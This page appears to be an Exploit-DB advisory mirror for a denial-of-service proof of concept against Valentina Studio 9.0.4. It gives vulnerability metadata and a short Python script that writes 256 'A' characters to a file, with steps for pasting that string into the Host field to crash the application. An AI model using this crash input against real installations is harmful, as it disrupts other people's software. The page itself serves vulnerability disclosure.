header-logo
Suggest Exploit
vendor:
Valentina Studio
by:
Victor Mondragón
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Valentina Studio
Affected Version From: 9.0.4
Affected Version To: 9.0.4
Patch Exists: Yes
Related CWE: N/A
CPE: valentina-db.com/en/developer/database/download-valentina-database-adk
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 x64 Service Pack 1
2018

Valentina Studio 9.0.4 – Denial of Service (PoC)

Valentina Studio 9.0.4 is vulnerable to a denial of service attack when a maliciously crafted file is opened. An attacker can exploit this vulnerability by creating a file containing 256 'A' characters and then opening it in Valentina Studio. This will cause the application to crash.

Mitigation:

Valentina Studio should be updated to the latest version to mitigate this vulnerability.
Source

Exploit-DB raw data:

#Exploit Title: Valentina Studio 9.0.4 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-19
#Vendor Homepage: https://valentina-db.com/en/
#Software Link: https://valentina-db.com/en/developer/database/download-valentina-database-adk
#Tested Version: 9.0.4
#Tested on: Windows 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: Valentina_Studio_9.0.4.py
#2.- Open valentina.txt and copy content to clipboard
#3.- Open Valentina Studio
#4.- Select "File" > "Connect to"
#5.- Select "Valentina Server"
#6.- Select "Host" and Paste Clipboard
#7.- Crashed

cod = "\x41" * 256

f = open('valentina.txt', 'w')
f.write(cod)
f.close()

Navigation

Suggest Exploit

Services By CQR